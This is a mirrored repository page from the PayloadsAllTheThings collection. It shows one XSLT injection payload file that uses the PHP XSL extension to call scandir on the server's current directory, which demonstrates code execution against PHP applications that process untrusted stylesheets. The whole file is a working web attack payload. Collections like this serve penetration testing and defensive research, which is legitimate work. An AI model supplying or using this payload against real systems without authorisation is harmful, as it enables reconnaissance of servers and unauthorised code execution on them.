1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-05-03 17:15:32 +02:00
PayloadsAllTheThings/XSLT Injection/Files/rce-php-scandir.xsl

5 lines
245 B
XML

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of name="assert" select="php:function('scandir', '.')"/>
</xsl:template>
</xsl:stylesheet>